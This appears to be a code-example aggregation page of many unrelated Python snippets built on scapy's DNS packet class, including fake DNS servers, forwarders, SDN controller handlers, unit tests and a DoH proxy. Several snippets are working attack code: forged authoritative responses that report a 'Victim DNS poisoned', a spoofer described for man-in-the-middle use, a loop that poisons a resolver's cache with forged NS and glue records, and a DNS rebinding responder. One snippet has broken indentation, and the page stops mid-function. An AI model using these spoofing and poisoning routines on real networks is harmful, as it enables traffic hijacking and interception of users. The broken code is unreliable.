Esempio n. 1
0
    def handle_packet(self):
        pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
        pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
        pkt_udp = self._pkt.get_protocols(udp.udp)
        dns = DNS(self._pkt[-1])
        cs = self._controller.get_customers()
        nsdomain = cs[0].get_ns_domain_name()

        if dns.qr == 1 and dns.ar.rrname != cs[0].get_ns_domain_name():
            dns.id = self._controller.get_transaction_id()
            new_pkt = packet.Packet()
            new_pkt.add_protocol(
                ethernet.ethernet(src='00:aa:bb:00:0f:11',
                                  dst=cs[0].get_next_hop_mac()))
            new_pkt.add_protocol(
                ipv4.ipv4(dst=cs[0].get_name_server(),
                          src=pkt_ip.src,
                          proto=17))
            new_pkt.add_protocol(
                udp.udp(src_port=53,
                        dst_port=self._controller.get_port_number()))
            new_pkt.add_protocol(dns)
            self.send_dns_response_packet(new_pkt, cs[0].get_datapath(),
                                          cs[0].get_ingress_port())

        if dns.qr == 1 and cs[0].get_ns_domain_name() == dns.ar.rrname:
            #print '----------I am calling another controller------------'
            self.send_dns_response_to_controller(self._pkt)
Esempio n. 2
0
    def on_read(self, fd, events):
        data, addr = self.socket.recvfrom(2048)
        try:
            dns = DNS(data)
        except:
            self.logger.warning("received malformed DNS packet from " + str(addr))
            return

        if dns.qr == 0:
            self.records[str(dns.id)] = {'time': datetime.utcnow(), 'from': addr}
            try:
                self.socket.sendto(data, (self.remote, 53))
                self.logger.debug("forwarded DNS request from " + str(addr))
            except Exception as e:
                self.logger.error(str(e))
        elif dns.qr == 1:
            record = self.records.get(str(dns.id), None)
            if record:
                try:
                    self.socket.sendto(data, record['from'])
                    self.logger.debug("forwarded DNS answer to " + str(record['from']))
                except Exception as e:
                    self.logger.error(str(e))
                del self.records[str(dns.id)]
            else:
                self.logger.debug("unknown DNS answer: " + dns.summary())
Esempio n. 3
0
def main():
    udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udps.bind((BIND_TO, 53))

    while 1:
        data, addr = udps.recvfrom(1024)

        p = DNS(data)

        rp = DNS(id=p.id, qr=1, qdcount=p.qdcount)
        rp.qd = p[DNSQR]

        if p.opcode == 0:
            rp.ancount = 1
            rp.rcode = 0
            answer_ip = resolve_or_fake(p.qd[0].qname)
            rp.an = DNSRR(rrname=p.qd[0].qname,
                          ttl=60,
                          rdlen=4,
                          rdata=answer_ip)
            print " - Responding to {0} with {1}.".format(
                p.qd[0].qname, answer_ip)
        else:
            # servfail
            rp.ancount = 0
            rp.rcode = 2
            print " ! Query opcode {0}, answering servfail.".format(p.opcode)

        udps.sendto(rp.build(), addr)
Esempio n. 4
0
	def buildp(self, dnsp, payload=None):
		n = DNS(id=dnsp.id,qr=1,opcode=0,aa=1,tc=0,rd=dnsp.rd,ra=0,qdcount=dnsp.qdcount,nscount=0,arcount=0,qd=dnsp.qd)
		if payload:
			a = DNSRR(rrname=dnsp.qd.qname,type=1,rclass=1,ttl=60,rdlen=4,rdata=payload)
			n.an = a
			n.ancount = 1
		return n
Esempio n. 5
0
def inquery(qname, qtype, nameserver, rd=1, timeout=2, retry=2):

    if not isinstance(nameserver, list):
        nameserver = [nameserver]

    s = socket.socket(type=socket.SOCK_DGRAM)
    s.settimeout(timeout)

    dnsq = DNS(id=RandShort(), rd=rd, qd=DNSQR(qname=qname, qtype=qtype))
    sendit = True
    id = 0

    for ns in nameserver:
        for r in range(0, retry + 1):
            try:
                if sendit:
                    p = str(dnsq)
                    id = unpack('!H', p[0:2])[0]
                    s.sendto(p, 0, (ns, 53))
                dnsr = DNS(s.recvfrom(4096)[0])
                if id != dnsr.id:
                    sendit = False
                    continue
                return dnsr
            except socket.timeout:
                sendit = True
                continue
            except socket.error:
                sendit = True
                continue

    return None
Esempio n. 6
0
def dnsSpoof(pkt):
    if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP):
        sendp(pkt, verbose=False)
    else:
        if (globalargs.randomSubdomain
                in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP):
            # return the response to the victim (it will think its from the authoritative DNS)
            spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \
                        UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \
                        DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \
               ns=DNSRR(rrname=globalargs.targetDomain,  type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \
                        ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl))
            send(spoof_pkt, verbose=False)
            print ccolors.OKGREEN + "Victim DNS poisoned...\n" + ccolors.NC

        elif (globalargs.randomSubdomain
              in pkt[DNS].qd.qname) and (pkt[IP].dst
                                         == globalargs.addressToForge):
            spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \
                   UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \
                   DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \
          an=DNSRR(rrname=pkt[DNS].qd.qname, type="A", rdata="123.123.123.123"))
            send(spoof_pkt, verbose=False)
            print ccolors.OKGREEN + "Attack successful!\n" + ccolors.NC + ccolors.WARNING + "Terminating..." + ccolors.NC
            sys.exit()
Esempio n. 7
0
def spoof_dns_response(orig_pkt, spoof_ip, iface):
    """
    Summary: This method responds to DNS Query by spoofing and can be utilized for
             Man In The Middle(MITM) attack.
    """
    print(f"Spoofing: {orig_pkt[DNSQR].qname.decode('UTF-8')}")
    try:
        # Construct DNS response with following modifications
        # qr: 1 --> response
        # ra: 1 --> recursion available
        # ancount:1 --> count of answers provided
        # an --> Spoofed DNS answer with dummy fixed ttl and IP
        dns_resp = DNS(id=orig_pkt[DNS].id,
                       qr=1,
                       ra=1,
                       ancount=1,
                       qdcount=orig_pkt[DNS].qdcount,
                       qd=orig_pkt[DNS].qd,
                       an=DNSRR(rrname=orig_pkt[DNSQR].qname,
                                rdata=spoof_ip,
                                ttl=DNS_TTL))
        resp_pkt = IP(dst=orig_pkt[IP].src, src=orig_pkt[IP].dst) / UDP(
            dport=orig_pkt[UDP].sport, sport=53) / DNS()
        resp_pkt[DNS] = dns_resp

        # Sending DNS response
        send(resp_pkt, verbose=0, iface=iface)
        return f"Spoofed DNS Response Sent: {orig_pkt[IP].src}"
    except Exception as err:
        raise err
Esempio n. 8
0
    def handle_socket_msg(self):
        pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
        pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
        pkt_udp = self._pkt.get_protocols(udp.udp)[0]
        pkt_dns = DNS(self._pkt[-1])
        print('----------------Sent query with ID', pkt_dns.id, pkt_dns)
        if pkt_udp.dst_port == 53 or pkt_udp.src_port == 53:
            #print 'A DNS query for controller is received'
            if pkt_dns:
                cs = self._controller.get_customers()
                d_mac = cs[0].get_next_hop_mac()
                pkt_dns.qr = 0

                new_pkt = packet.Packet()
                e = ethernet.ethernet(dst=cs[0].get_next_hop_mac(),
                                      src=pkt_eth.src)
                new_pkt.add_protocol(e)
                new_pkt.add_protocol(
                    ipv4.ipv4(src=self._controller.get_ip(),
                              dst=cs[0].get_name_server(),
                              proto=17))
                new_pkt.add_protocol(
                    udp.udp(src_port=pkt_udp.dst_port,
                            dst_port=pkt_udp.src_port))
                new_dns = DNS(rd=0,
                              id=pkt_dns.id,
                              qd=DNSQR(qname=pkt_dns.qd.qname),
                              ns=DNSRR(rrname=pkt_dns.ar.rrname,
                                       type=1,
                                       ttl=60000,
                                       rdata=cs[0].get_name_server()))
                new_pkt.add_protocol(new_dns)
                new_pkt.serialize()
                self.send_dns_packet(new_pkt, cs[0].get_datapath(),
                                     cs[0].get_ingress_port())
Esempio n. 9
0
def main():
    mode = sys.argv[1] if len(sys.argv) > 1 else "none"
    if not mode in ["fakenx", "fake"]:
        print >> sys.stderr, 'Please supply argv[1] in ["fakenx", "fake"]'
        return 1

    udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udps.bind((BIND_TO, 53))

    while 1:
        data, addr = udps.recvfrom(1024)

        p = DNS(data)

        rp = DNS(id=p.id, qr=1, qdcount=p.qdcount)
        rp.qd = p[DNSQR]

        if p.opcode == 0:
            rp.ancount = 1
            rp.rcode = 0
            answer_ip = ANSWER_WITH
            if mode == "fakenx": answer_ip = resolve_or_fake(p.qd[0].qname)
            rp.an = DNSRR(rrname=p.qd[0].qname,
                          ttl=60,
                          rdlen=4,
                          rdata=answer_ip)
            print " - Responding to {0} with {1}.".format(
                p.qd[0].qname, answer_ip)
        else:
            rp.ancount = 0
            rp.rcode = 2
            print " ! Query opcode {0}, answering servfail.".format(p.opcode)

        udps.sendto(rp.build(), addr)
Esempio n. 10
0
    def craft_MDNS_IPv6(self, packet: Packet) -> Packet:
        """
        This function crafts a MDNS-IPv6 packet.
        """

        name = packet[DNSQR].qname

        return (
            [
                IPv6(dst=self.multicast_v6) / UDP(sport=5353, dport=5353) /
                DNS(
                    qr=1,
                    aa=1,
                    rd=0,
                    ancount=self.ipv6_number,
                    an=self.craft_DNSv6_response(name),
                ),
                IPv6(dst=self.multicast_v6) / UDP(sport=5353, dport=5353) /
                DNS(
                    qr=1,
                    aa=1,
                    rd=0,
                    ancount=1,
                    an=DNSRR(ttl=30, rrname=name, rdata=self.ip),
                ),
            ],
            packet[IPv6].src,
            name,
            "DNS",
        )
Esempio n. 11
0
def info(interface):
    print("package test")

    test_domain = 'www.google.com'
    client = NM.Client.new(None)
    dev = client.get_device_by_iface(interface)
    ip4config = dev.get_ip4_config()
    ip6config = dev.get_ip6_config()
    name_servers4 = ip4config.get_nameservers()
    name_servers6 = ip6config.get_nameservers()

    print("IPv4 DNS servers: {}".format(name_servers4))
    print("DNS query to {}".format(name_servers4[0]))

    payload = IP(dst=name_servers4[0])
    payload /= UDP(dport=53)
    payload /= DNS(rd=1, qd=DNSQR(qname='www.thepacketgeek.com'))
    dns_rep = sr1(payload, verbose=0)

    for i in range(dns_rep['DNS'].arcount):
        print("DNS reply: {}".format(dns_rep['DNS'].ar[i].rdata))

    print("IPv6 DNS servers: {}".format(name_servers6))
    print("DNS query to {}".format(name_servers6[0]))

    payload = IPv6(dst=name_servers6[0])
    payload /= UDP(dport=53)
    payload /= DNS(rd=1, qd=DNSQR(qname='www.thepacketgeek.com'))
    dns_rep = sr1(payload, verbose=0)

    for i in range(dns_rep['DNS'].arcount):
        print("DNS reply: {}".format(dns_rep['DNS'].ar[i].rdata))
Esempio n. 12
0
def test_dns():
    """
    Tests DNS layer.
    """
    dns = layers.dns_layer.DNSLayer(DNS())
    print(dns.gen("id"))
    assert dns.gen("id")

    p = layers.packet.Packet(DNS(id=0xabcd))
    p2 = layers.packet.Packet(DNS(bytes(p)))
    assert p.get("DNS", "id") == 0xabcd
    assert p2.get("DNS", "id") == 0xabcd

    p2.set("DNS", "id", 0x4321)
    assert p.get("DNS", "id") == 0xabcd  # Check p is unchanged
    assert p2.get("DNS", "id") == 0x4321

    dns = layers.packet.Packet(DNS(aa=1))
    assert dns.get("DNS", "aa") == 1
    aa = dns.gen("DNS", "aa")
    assert aa == 0 or aa == 1
    assert dns.get("DNS", "aa") == 1  # Original value unchanged

    dns = layers.packet.Packet(DNS(opcode=15))
    assert dns.get("DNS", "opcode") == 15
    opcode = dns.gen("DNS", "opcode")
    assert opcode >= 0 and opcode <= 15
    assert dns.get("DNS", "opcode") == 15  # Original value unchanged

    dns.set("DNS", "opcode", 3)
    assert dns.get("DNS", "opcode") == 3

    dns = layers.packet.Packet(DNS(qr=0))
    assert dns.get("DNS", "qr") == 0
    qr = dns.gen("DNS", "qr")
    assert qr == 0 or qr == 1
    assert dns.get("DNS", "qr") == 0  # Original value unchanged

    dns.set("DNS", "qr", 1)
    assert dns.get("DNS", "qr") == 1

    dns = layers.packet.Packet(DNS(arcount=0xAABB))
    assert dns.get("DNS", "arcount") == 0xAABB
    arcount = dns.gen("DNS", "arcount")
    assert arcount >= 0 and arcount <= 0xffff
    assert dns.get("DNS", "arcount") == 0xAABB  # Original value unchanged

    dns.set("DNS", "arcount", 65432)
    assert dns.get("DNS", "arcount") == 65432

    dns = layers.dns_layer.DNSLayer(DNS() / DNSQR(qname="example.com"))
    assert isinstance(dns.get_next_layer(), DNSQR)
    print(dns.gen("id"))
    assert dns.gen("id")

    p = layers.packet.Packet(DNS(id=0xabcd))
    p2 = layers.packet.Packet(DNS(bytes(p)))
    assert p.get("DNS", "id") == 0xabcd
    assert p2.get("DNS", "id") == 0xabcd
Esempio n. 13
0
def test_decompress(logger):
    """
    Tests the tamper 'decompress' primitive.
    """
    tamper = actions.tamper.TamperAction(None,
                                         field="qd",
                                         tamper_type="compress",
                                         tamper_value=10,
                                         tamper_proto="DNS")
    assert tamper.field == "qd", "Tamper action changed fields."
    assert tamper.tamper_type == "compress", "Tamper action changed types."
    assert str(
        tamper
    ) == "tamper{DNS:qd:compress}", "Tamper returned incorrect string representation: %s" % str(
        tamper)

    packet = layers.packet.Packet(
        IP(dst="8.8.8.8") / UDP(dport=53) / DNS(qd=DNSQR(qname="minghui.ca.")))
    original = packet.copy()
    tamper.tamper(packet, logger)
    assert bytes(
        packet["DNS"]
    ) == b'\x00\x00\x01\x00\x00\x02\x00\x00\x00\x00\x00\x00\x07minghui\xc0\x1a\x00\x01\x00\x01\x02ca\x00\x00\x01\x00\x01'
    resp = sr1(packet.packet)
    assert resp["DNS"]
    assert resp["DNS"].rcode != 1
    assert resp["DNSQR"]
    assert resp["DNSRR"].rdata
    assert confirm_unchanged(packet, original, IP, ["len"])
    print(resp.summary())

    packet = layers.packet.Packet(
        IP(dst="8.8.8.8") / UDP(dport=53) /
        DNS(qd=DNSQR(qname="maps.google.com")))
    original = packet.copy()
    tamper.tamper(packet, logger)
    assert bytes(
        packet["DNS"]
    ) == b'\x00\x00\x01\x00\x00\x02\x00\x00\x00\x00\x00\x00\x04maps\xc0\x17\x00\x01\x00\x01\x06google\x03com\x00\x00\x01\x00\x01'
    resp = sr1(packet.packet)
    assert resp["DNS"]
    assert resp["DNS"].rcode != 1
    assert resp["DNSQR"]
    assert resp["DNSRR"].rdata
    assert confirm_unchanged(packet, original, IP, ["len"])
    print(resp.summary())

    # Confirm this is a NOP on normal packets
    packet = layers.packet.Packet(IP() / UDP())
    original = packet.copy()
    tamper.tamper(packet, logger)
    assert packet.packet.summary() == original.packet.summary()

    # Confirm tamper didn't corrupt anything else in the TCP header
    assert confirm_unchanged(packet, original, UDP, [])

    # Confirm tamper didn't corrupt anything else in the IP header
    assert confirm_unchanged(packet, original, IP, [])
Esempio n. 14
0
File: 01-run.py Progetto: dylad/RIOT
 def test_doc_success(self):
     self._set_resp(
         2,
         1,
         DNS(
             qr=1,
             qd=[DNSQR(qname="example.org", qtype="AAAA")],
             ancount=1,  # ancount needs to be set since `an` is already encoded
             an=(
                 # already encoding
                 # [DNSRR(ttl=300, type="AAAA", rdata="2001:db8::1")]
                 # to make older scapy version on Murdock happy
                 b"\x00\x00\x1c\x00\x01\x00\x00\x01,\x00\x10 \x01\r\xb8\x00\x00"
                 b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"
             ),
         ),
     )
     self.spawn.sendline("uri coap://[::1]")
     self.spawn.expect_exact("Successfully added URI coap://[::1]")
     self.spawn.sendline("query example.org")
     self.spawn.expect_exact(
         "Hostname example.org resolves to 2001:db8::1 (IPv6)"
     )
     self.spawn.sendline("query example.org inet6")
     self.spawn.expect_exact(
         "Hostname example.org resolves to 2001:db8::1 (IPv6)"
     )
     self.spawn.sendline("query example.org inet")
     self.spawn.expect_exact("Bad message")
     self._set_resp(
         2,
         1,
         DNS(
             qr=1,
             qd=[DNSQR(qname="example.org", qtype="A")],
             ancount=1,  # ancount needs to be set since `an` is already encoded
             an=(
                 # already encoding
                 # [DNSRR(ttl=300, type="A", rdata="192.0.0.1")]
                 # to make older scapy version on Murdock happy
                 b"\x00\x00\x01\x00\x01\x00\x00\x01,\x00\x04\xc0\x00\x00\x01"
             ),
         ),
     )
     self.spawn.sendline("query example.org inet")
     self.spawn.expect_exact(
         "Hostname example.org resolves to 192.0.0.1 (IPv4)"
     )
     if self.has_dns_cache():
         self.spawn.sendline("query example.org inet6")
         self.spawn.expect_exact(
             "Hostname example.org resolves to 2001:db8::1 (IPv6)"
         )
     else:
         self.spawn.sendline("query example.org inet6")
         self.spawn.expect_exact("Bad message")
Esempio n. 15
0
	def io_in(self, data):
		a = DNS()
		try:
			a.dissect(data[2:])
			if DEBUG: a.show()
			if not a.qd: return self.err(a, 1)
			self.answer(a)
		except:
			traceback.print_exc()
			self.err(a, 1)
Esempio n. 16
0
    def handle_packet(self):
        pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
        pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
        pkt_udp = self._pkt.get_protocols(udp.udp)
        dns = DNS(self._pkt[-1])
        cs = self._controller.get_customers()

        for c in range(len(cs)):
            if IPAddress(pkt_ip.src) in IPNetwork(
                    cs[c].get_private_ip_subnet()):
                index = c
                #print'---##################INEX#############',index
                #self._controller.set_current_customer_id(index)
        #index=self._controller.get_current_customer_id()
        if pkt_udp is not None and self._pport is not None:
            new_pkt = packet.Packet()
            new_pkt.add_protocol(
                ethernet.ethernet(src='10:00:00:00:10:ff',
                                  dst=cs[index].get_next_hop_mac()))
            new_pkt.add_protocol(
                ipv4.ipv4(src='10.1.0.18',
                          dst=cs[index].get_name_server(),
                          proto=17))
            #print '********index********',pkt_udp,'*******PORT********',self._pport,'######################'
            new_pkt.add_protocol(udp.udp(src_port=53, dst_port=self._pport))
            #print'---pkt is created---til udp'
            #new_dns=DNS(rd=0,id=pkt_dns.id,qd=DNSQR(qname=pkt_dns.qd.qname),ns=DNSRR(rrname=pkt_dns.ar.rrname,type=1,ttl=60000,rdata=cs[index].get_name_server()))
            dns = DNS(rd=0,
                      id=dns.id,
                      qr=1L,
                      qd=dns.qd,
                      ancount=1,
                      nscount=1,
                      arcount=1,
                      an=(DNSRR(rrname='ROOT-SERVER.',
                                type='A',
                                rclass='IN',
                                ttl=60000,
                                rdata='10.1.0.18')),
                      ns=(DNSRR(rrname='ROOT-SERVER.',
                                type='NS',
                                rclass='IN',
                                ttl=3600,
                                rdata='.')),
                      ar=DNSRR(rrname='ROOT-SERVER.',
                               type='A',
                               rclass='IN',
                               ttl=60000,
                               rdata='10.1.0.18'))
            #print('---DNS fo . SENT----',dns)
            new_pkt.add_protocol(dns)
            new_pkt.serialize()
            self.send_dns_packet(new_pkt, cs[index].get_datapath(),
                                 cs[index].get_ingress_port())
            self._pport = None
Esempio n. 17
0
def loud(args):
    poisoned = False

    # first packet sent to the victim NS to start the recursive domain to ip resolution
    reqPkt = IP(dst=args.victim) / UDP(sport=53) / DNS(qr=0,
                                                       qd=DNSQR(qname=""))
    # authoritative record
    realNSRR = DNSRR(rrname=args.targetDomain,
                     type='NS',
                     rdata=args.soaDomain[0],
                     ttl=args.ttl)
    # fake additional record (glue)
    fakeARR = DNSRR(rrname=args.soaDomain[0],
                    type='A',
                    rdata=args.addressToForge,
                    ttl=args.ttl)

    amount = 5
    resPkts = list()
    for x in xrange(0, amount - 1):
        resPkts.append(
            IP(dst=args.victim) / UDP(sport=53, dport=54) /
            DNS(aa=1, qr=1, qd=DNSQR(qname=""), ns=realNSRR, ar=fakeARR))

    while not poisoned:
        # generate random subdomain, i.e. 1234www5678.example.com
        queryDomain = utils.getRandomSubdomain() + args.targetDomain

        for x in xrange(0, amount - 1):
            resPkts[x][DNS].id = utils.getRandomTXID()
            resPkts[x][DNS].qd.qname = queryDomain

        reqPkt[DNS].qd.qname = queryDomain
        send(reqPkt, verbose=False)

        for x in xrange(0, amount - 1):
            send(resPkts[x], verbose=False)

        # ask the victim for the IP of the domain we are trying to spoof
        pkt = sr1(IP(dst=args.victim) / UDP(sport=53) /
                  DNS(qr=0, qd=DNSQR(qname=args.soaDomain[0], qtype='A')),
                  verbose=False)
        if pkt[DNS].an and pkt[DNS].an.rdata:
            actualAnswer = str(pkt[DNS].an.rdata)
            # if the IP is our IP, we poisoned the victim
            if actualAnswer == args.addressToForge:
                poisoned = True

    print ccolors.OKGREEN + 'Poisoned now!\n' + ccolors.NC

    deltaTime = datetime.datetime.now() - args.startTime

    print ccolors.WARNING + 'It took: ' + str(deltaTime) + ccolors.NC
Esempio n. 18
0
def getSoaForDomain(args):
    pkt = IP(dst="8.8.8.8") / UDP(sport=utils.getRandomPort()) / DNS(qr=0, rd=1, qd=DNSQR(qname=args.targetDomain, qtype="NS"))
    ans = sr1(pkt, verbose=False)
    args.soaDomain = list(expandLayers(ans[DNS].an, "rdata"))

    args.soaIP = list()
    for domain in args.soaDomain:
    pkt = IP(dst="8.8.8.8") / UDP(sport=utils.getRandomPort()) / DNS(qd=DNSQR(qname=domain, qtype="A"))
        ans = sr1(pkt, verbose=False)
        args.soaIP.append(ans[DNS].an.rdata)

    print args
Esempio n. 19
0
def dohHandler(data, address, csocket, doh_host, deny_list):
    # implement DNS over HTTPS
    dns_req = IP(dst=doh_host) / UDP(dport=UDP_PORT) / DNS(data)
    qid = dns_req[DNS].id
    qname = dns_req[DNSQR].qname
    orig_qname = qname
    qname_str = qname.decode()
    qname_str = qname_str[:-1]
    qname = qname_str.encode()

    qtype = dns_req[DNSQR].qtype

    if qtype == 1:
        query_type = 'A'
    if qtype == 5:
        query_type = 'CNAME'
    if qtype == 2:
        query_type = 'NS'
    if qtype == 15:
        query_type = 'MX'

    # Check if domain name should be blocked, log if needed
    for domain in deny_list:

        domain = domain.strip()
        domainbytes = domain.encode()
        if qname == domainbytes:
            # QNAME should be denied
            if logging:
                logf.write(qname.decode())
                logf.write(' ')
                logf.write(query_type)
                logf.write(' DENY\n')
            nxd = DNS(id=qid, rcode=3, qd=DNSQR(qtype=qtype, qname=orig_qname))
            resp_pkt = nxd
            csocket.sendto(bytes(resp_pkt), address)
            return

    # Log if necessary
    if logging:
        logf.write(qname.decode())
        logf.write(' ')
        logf.write(query_type)
        logf.write(' ALLOWED\n')

    # Send using HTTPS protocol
    url = 'https://' + qname_str
    req = urllib.request.Request(url)
    req.add_header('Referer', doh_host)
    r = urllib.request.urlopen(req)
    resp = r.read()
    csocket.sendto(resp, address)
Esempio n. 20
0
    def forward_dns(orig_pkt):
        print(f'Forwarding: {orig_pkt[DNSQR].qname}')
        resp_pkt = IP(dst=orig_pkt[IP].src) / UDP(
            dport=orig_pkt[UDP].sport) / DNS()
        response = sr1(IP(dst='8.8.8.8') / UDP(sport=orig_pkt[UDP].sport) /
                       DNS(rd=1,
                           id=orig_pkt[DNS].id,
                           qd=DNSQR(qname=orig_pkt[DNSQR].qname)),
                       verbose=0)

        resp_pkt[DNS] = response[DNS]
        send(resp_pkt, verbose=0)
        return f'Responding: {resp_pkt.summary()}'
Esempio n. 21
0
def main():
    mode = sys.argv[1] if len(sys.argv) > 1 else "none"
    if not mode in ["fakenx", "fake"]:
        print >>sys.stderr, 'Please supply argv[1] in ["fakenx", "fake"]'
        return 1

    udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udps.bind((BIND_TO,53))
    
    while 1:
        data, addr = udps.recvfrom(1024)

        p = DNS(data)

        rp = DNS(id=p.id, qr=1, qdcount=p.qdcount)
        rp.qd = p[DNSQR]

        if p.opcode == 0:
            rp.ancount = 1
            rp.rcode = 0
            answer_ip = ANSWER_WITH
            if mode == "fakenx": answer_ip = resolve_or_fake(p.qd[0].qname)
            rp.an = DNSRR(rrname=p.qd[0].qname, ttl=60, rdlen=4, rdata=answer_ip)
            print " - Responding to {0} with {1}.".format(p.qd[0].qname, answer_ip)
        else:
            rp.ancount = 0
            rp.rcode = 2
            print " ! Query opcode {0}, answering servfail.".format(p.opcode)

        udps.sendto(rp.build(), addr)
 def forward_dns(orig_pkt: IP):
     print("Forwarding: {orig_pkt[DNSQR].qname}")
     response = sr1(
         IP(dst='192.168.1.1') / UDP(sport=orig_pkt[UDP].sport) /
         DNS(rd=1,
             id=orig_pkt[DNS].id,
             qd=DNSQR(qname=orig_pkt[DNSQR].qname)),
         verbose=0,
     )
     resp_pkt = IP(dst=orig_pkt[IP].src, src=DNS_SERVER_IP) / UDP(
         dport=orig_pkt[UDP].sport) / DNS()
     resp_pkt[DNS] = response[DNS]
     send(resp_pkt, verbose=0)
     return "Responding to {orig_pkt[IP].src}"
Esempio n. 23
0
File: fakedns.py Progetto: rep/misc
def main():
    udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udps.bind((BIND_TO,53))
    
    while 1:
        data, addr = udps.recvfrom(1024)

        p = DNS(data)

        rp = DNS(id=p.id, qr=1, qdcount=p.qdcount)
        rp.qd = p[DNSQR]

        if p.opcode == 0:
            rp.ancount = 1
            rp.rcode = 0
            answer_ip = resolve_or_fake(p.qd[0].qname)
            rp.an = DNSRR(rrname=p.qd[0].qname, ttl=60, rdlen=4, rdata=answer_ip)
            print " - Responding to {0} with {1}.".format(p.qd[0].qname, answer_ip)
        else:
            # servfail
            rp.ancount = 0
            rp.rcode = 2
            print " ! Query opcode {0}, answering servfail.".format(p.opcode)

        udps.sendto(rp.build(), addr)
Esempio n. 24
0
def test_dnsqr():
    """
    Tests DNSQR.
    """
    pkt = UDP() / DNS(ancount=1) / DNSQR()
    pkt.show()
    packet = layers.packet.Packet(pkt)
    packet.show()
    assert len(packet.layers) == 3
    assert "UDP" in packet.layers
    assert "DNS" in packet.layers
    assert "DNSQR" in packet.layers
    pkt = IP() / UDP() / DNS() / DNSQR()
    packet = layers.packet.Packet(pkt)
    assert str(packet)
Esempio n. 25
0
def dns_serv(args):
    from scapy.all import DNS, DNSRR, DNSQR
    import time

    udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udps.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    udps.bind((args.bind, 53))

    cache = {}
    lru = []
    last_cleanup = time.time()
    
    while 1:
        data, addr = udps.recvfrom(1024)

        p = DNS(data)
        rp = DNS(id=p.id, qr=1, qdcount=p.qdcount, ancount=1, rcode=0)
        rp.qd = p[DNSQR]

        # IN A
        if p.opcode == 0 and p[DNSQR].qtype == 1 and p[DNSQR].qclass == 1:
            if not p.qd[0].qname in cache:
                if p.qd[0].qname == "dns.msftncsi.com.":
                    answer_ip = "131.107.255.255"
                else:
                    answer_ip = randip()
                rp.an = DNSRR(rrname=p.qd[0].qname, ttl=60, rdlen=4, rdata=answer_ip)
            else:
                lru.remove(p.qd[0].qname)
                rp.an = DNSRR(rrname=p.qd[0].qname, ttl=60, rdlen=4, rdata=cache[p.qd[0].qname])

            log.debug("Responding to {0}/{2},{3} with {1}/{4},{5}.".format(p.qd[0].qname, answer_ip, p[DNSQR].qtype, p[DNSQR].qclass, rp.an.type, rp.an.rclass))
            cache[p.qd[0].qname] = answer_ip
            lru.append(p.qd[0].qname)

        # IN PTR, just send NXDOMAIN
        elif p.opcode == 0 and p[DNSQR].qtype == 12 and p[DNSQR].qclass == 1:
            rp.ancount = 0
            rp.rcode = 3
            log.info("PTR query to {0}/{1},{2} answering nxdomain".format(p.qd[0].qname, p[DNSQR].qtype, p[DNSQR].qclass))
        else:
            rp.ancount = 0
            rp.rcode = 2
            log.warn("Unhandled query opcode {0} for {1}/{2},{3} - answering servfail.".format(p.opcode, p.qd[0].qname, p[DNSQR].qtype, p[DNSQR].qclass))

        udps.sendto(rp.build(), addr)

        if last_cleanup < time.time() - 60:
            last_cleanup = time.time()
            if len(cache) > CACHESIZE:
                to_remove, lru = lru[:CACHESIZE*0.1], lru[CACHESIZE*0.1:]
                for i in to_remove:
                    del cache[i]
Esempio n. 26
0
def dns_callback(pkt):
    if DNS in pkt and not UDPerror in pkt:

        global first_request
        global dns_id

        ip = pkt.getlayer(IP)
        dns = pkt.getlayer(DNS)

        if dns.qr:
            return dns.summary()
        else:
            if dns.qd != None and dns_id != dns.id:

                if confusion in dns.qd.qname:
                    dns_id = dns.id

                    answer = IP(dst=ip.src, src=ip.dst) / UDP(
                        dport=ip.sport, sport=ip.dport) / DNS(
                            id=dns.id,
                            qr=1,
                            qd=dns.qd,
                            an=DNSRR(rrname=dns.qd.qname,
                                     type="CNAME",
                                     ttl=dns_ttl,
                                     rdata=attacker) /
                            DNSRR(rrname=attacker, ttl=dns_ttl, rdata=victim))
                    send(answer, loop=0)

                    return dns.summary()

                elif attacker in dns.qd.qname:

                    dns_id = dns.id

                    answer = IP(dst=ip.src, src=ip.dst) / UDP(
                        dport=ip.sport, sport=ip.dport
                    ) / DNS(
                        id=dns.id,
                        qr=1,
                        qd=dns.qd,
                        an=DNSRR(rrname=dns.qd.qname,
                                 ttl=dns_ttl,
                                 rdata=attacker_ip) /
                        DNSRR(rrname=dns.qd.qname, ttl=dns_ttl, rdata=victim))
                    send(answer, loop=0)

                    return dns.summary()
Esempio n. 27
0
def dnsHandler(data, address, csocket, dns_ip, deny_list):
    # Form a DNS request using scapy
    dns_req = IP(dst=dns_ip) / UDP(dport=UDP_PORT) / DNS(data)
    qid = dns_req[DNS].id
    qname = dns_req[DNSQR].qname
    orig_qname = qname
    qname_str = qname.decode()
    qname_str = qname_str[:-1]
    qname = qname_str.encode()

    qtype = dns_req[DNSQR].qtype

    if qtype == 1:
        query_type = 'A'
    if qtype == 5:
        query_type = 'CNAME'
    if qtype == 2:
        query_type = 'NS'
    if qtype == 15:
        query_type = 'MX'

    # Check if domain name should be blocked, log if needed
    for domain in deny_list:
        domain = domain.strip()
        domainbytes = domain.encode()

        if qname == domainbytes:
            # QNAME should be denied
            if logging:
                logf.write(qname.decode())
                logf.write(' ')
